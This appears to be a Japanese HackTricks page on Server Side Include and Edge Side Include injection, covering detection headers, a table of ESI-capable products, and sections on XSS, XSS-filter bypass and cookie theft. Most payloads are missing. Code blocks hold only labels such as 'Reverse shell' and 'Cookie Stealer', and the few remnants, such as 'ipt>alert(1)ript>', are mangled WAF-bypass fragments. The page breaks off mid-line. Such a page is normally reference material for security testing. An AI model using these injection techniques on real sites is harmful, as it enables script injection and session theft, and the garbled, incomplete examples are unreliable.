# サーバーサイドインクルージョン/エッジサイドインクルージョンインジェクション {{#include ../banners/hacktricks-training.md}} ## サーバーサイドインクルージョン基本情報 **(紹介は** [**Apache docs**](https://httpd.apache.org/docs/current/howto/ssi.html)**からのものです)** SSI (Server Side Includes) は、**HTMLページに配置され、ページが提供される際にサーバーで評価される指示文**です。これにより、**既存のHTMLページに動的に生成されたコンテンツを追加**することができ、CGIプログラムや他の動的技術を介してページ全体を提供する必要がありません。\ 例えば、既存のHTMLページに次のような指示文を配置することができます： `` そして、ページが提供されると、この断片は評価され、その値に置き換えられます： `Tuesday, 15-Jan-2013 19:28:54 EST` SSIを使用するタイミングと、ページ全体をプログラムによって生成するタイミングの決定は、通常、ページのどの部分が静的で、どの部分がページが提供されるたびに再計算される必要があるかの問題です。SSIは、上記のように現在の時刻などの小さな情報を追加するのに最適です。しかし、ページの大部分が提供される際に生成される場合は、他の解決策を探す必要があります。ウェブアプリケーションが**`.shtml`、`.shtm`、または`.stm`**の拡張子を持つファイルを使用している場合、SSIの存在を推測できますが、それだけではありません。典型的なSSI表現は次の形式を持っています： ``` ``` ### チェック ```javascript // Document name // Date // File inclusion // Including files (same directory) // CGI Program results // Including virtual files (same directory) // Modification date of a file // Command exec // Command exec // Reverse shell // Print all variables // Setting variables ``` ## Edge Side Inclusion 情報を**キャッシュすることや動的アプリケーション**に関する問題があり、コンテンツの一部は次回コンテンツが取得される際に**異なる**可能性があります。これが**ESI**が使用される理由であり、ESIタグを使用して**生成する必要がある動的コンテンツ**を示します。\ もし**攻撃者**がキャッシュコンテンツ内に**ESIタグを注入**できれば、ユーザーに送信される前に文書に**任意のコンテンツを注入**できる可能性があります。 ### ESI Detection サーバーからのレスポンスにおける以下の**ヘッダー**は、サーバーがESIを使用していることを意味します： ``` Surrogate-Control: content="ESI/1.0" ``` このヘッダーが見つからない場合、サーバーは**それでもESIを使用している可能性があります**。\ **盲目的なエクスプロイト手法も使用可能です**。攻撃者のサーバーにリクエストが到着する必要があります： ```javascript // Basic detection hello // If previous is reflected as "hello", it's vulnerable // Blind detection // XSS Exploitation Example // Cookie Stealer (bypass httpOnly flag) // Introduce private local files (Not LFI per se) // Valid for Akamai, sends debug information in the response ``` ### ESIの悪用 [GoSecureが作成した](https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/)表は、サポートされている機能に応じて、さまざまなESI対応ソフトウェアに対して試すことができる可能性のある攻撃を理解するためのものです。 - **Includes**: ``ディレクティブをサポート - **Vars**: ``ディレクティブをサポート。XSSフィルターを回避するのに便利 - **Cookie**: ドキュメントクッキーはESIエンジンにアクセス可能 - **Upstream Headers Required**: 上流アプリケーションがヘッダーを提供しない限り、サロゲートアプリケーションはESIステートメントを処理しない - **Host Allowlist**: この場合、ESIのインクルードは許可されたサーバーホストからのみ可能であり、例えばSSRFはこれらのホストに対してのみ可能 | **ソフトウェア** | **Includes** | **Vars** | **Cookies** | **Upstream Headers Required** | **Host Whitelist** | | :--------------------------: | :----------: | :------: | :---------: | :---------------------------: | :----------------: | | Squid3 | はい | はい | はい | はい | いいえ | | Varnish Cache | はい | いいえ | いいえ | はい | はい | | Fastly | はい | いいえ | いいえ | いいえ | はい | | Akamai ESIテストサーバー (ETS) | はい | はい | はい | いいえ | いいえ | | NodeJS esi | はい | はい | はい | いいえ | いいえ | | NodeJS nodesi | はい | いいえ | いいえ | いいえ | オプション | #### XSS 次のESIディレクティブは、サーバーのレスポンス内に任意のファイルをロードします。 ```xml ``` #### クライアントXSS保護のバイパス ```xml x=>alert(/Chrome%20XSS%20filter%20bypass/);> Use to bypass WAFs: ipt>alert(1)ript> error=alert(1)> ``` #### クッキーを盗む - リモートクッキーを盗む ```xml ``` - XSSを使用してHTTP_ONLYクッキーを盗むには、それをレスポンスに反映させます: ```bash # This will reflect the cookies in the response # Reflect XSS (you can put '">